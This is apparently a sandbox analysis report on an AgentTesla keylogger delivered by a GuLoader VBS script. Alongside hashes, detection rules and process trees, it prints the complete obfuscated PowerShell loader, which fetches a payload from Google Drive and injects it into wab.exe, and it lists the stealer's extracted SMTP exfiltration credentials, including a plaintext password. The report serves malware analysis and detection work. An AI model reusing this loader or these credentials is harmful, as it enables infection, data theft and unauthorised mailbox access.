agenttesla | f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19-04-2024 02:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff.vbs
Size

279KB
MD5

4dbc97f8d5317c9d1dfacb195dbe6af7
SHA1

c50c88d61aed7ec85c31f18267bca471cf94065d
SHA256

f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff
SHA512

8a6ddaea7ce4dd6767fa309339e23b38e7f2b77e03e2d5111fe772195231c2ba09ade5a4d4def839204316d0a50d3315cdbab29d7d0e193dc8ce6fcec827b578
SSDEEP

6144:LmdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOKR8q3iQFw0:6nS2Im4WnPwp

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.electricistas-24hs.com.ar
Port:
587
Username:
contactos@electricistas-24hs.com.ar
Password:
Martin*olmos2017
Email To:
indexforwarder@gmail.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Detect packed .NET executables. Mostly AgentTeslaV4. 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_EXE_Packed_GEN01
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_EXE_Packed_GEN01
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_EXE_Packed_GEN01

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL

Detects executables referencing Windows vault credential objects. Observed in infostealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

Detects executables referencing many file transfer clients. Observed in information stealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-83-0x0000000000780000-0x00000000017E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
behavioral1/memory/1780-87-0x0000000000780000-0x00000000007C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
behavioral1/memory/1780-89-0x0000000022070000-0x00000000220B0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1692 WScript.exe
7 2560 powershell.exe
9 2560 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

11 drive.google.com
6 drive.google.com
7 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
17 ip-api.com
15 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1780 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1292 powershell.exe
1780 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1292 set thread context of 1780 1292 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2560 powershell.exe
1292 powershell.exe
1292 powershell.exe
1780 wab.exe
1780 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1292 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2560 powershell.exe
Token: SeDebugPrivilege 1292 powershell.exe
Token: SeDebugPrivilege 1780 wab.exe

flow	pid	process
3	1692	WScript.exe
7	2560	powershell.exe
9	2560	powershell.exe

flow	ioc
11	drive.google.com
6	drive.google.com
7	drive.google.com

flow	ioc
16	api.ipify.org
17	ip-api.com
15	api.ipify.org

pid	process
1780	wab.exe

pid	process
1292	powershell.exe
1780	wab.exe

description	pid	process	target process
PID 1292 set thread context of 1780	1292	powershell.exe	wab.exe

pid	process
2560	powershell.exe
1292	powershell.exe
1292	powershell.exe
1780	wab.exe
1780	wab.exe

pid	process
1292	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	1780	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1692 wrote to memory of 2560	1692	WScript.exe	powershell.exe
PID 1692 wrote to memory of 2560	1692	WScript.exe	powershell.exe
PID 1692 wrote to memory of 2560	1692	WScript.exe	powershell.exe
PID 2560 wrote to memory of 2600	2560	powershell.exe	cmd.exe
PID 2560 wrote to memory of 2600	2560	powershell.exe	cmd.exe
PID 2560 wrote to memory of 2600	2560	powershell.exe	cmd.exe
PID 2560 wrote to memory of 1292	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1292	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1292	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 1292	2560	powershell.exe	powershell.exe
PID 1292 wrote to memory of 2412	1292	powershell.exe	cmd.exe
PID 1292 wrote to memory of 2412	1292	powershell.exe	cmd.exe
PID 1292 wrote to memory of 2412	1292	powershell.exe	cmd.exe
PID 1292 wrote to memory of 2412	1292	powershell.exe	cmd.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe
PID 1292 wrote to memory of 1780	1292	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
3⤵
PID:2600

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
4⤵
PID:2412

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
752ae86ba35153a67f13062f01e50a1a

SHA1
c33da750ab351dccbaa713426f7f5356a8cd2eb0

SHA256
9c49a10430ae80a158bf677ba5f97ec290fccb1f6c01be53283876d77c0c1f0a

SHA512
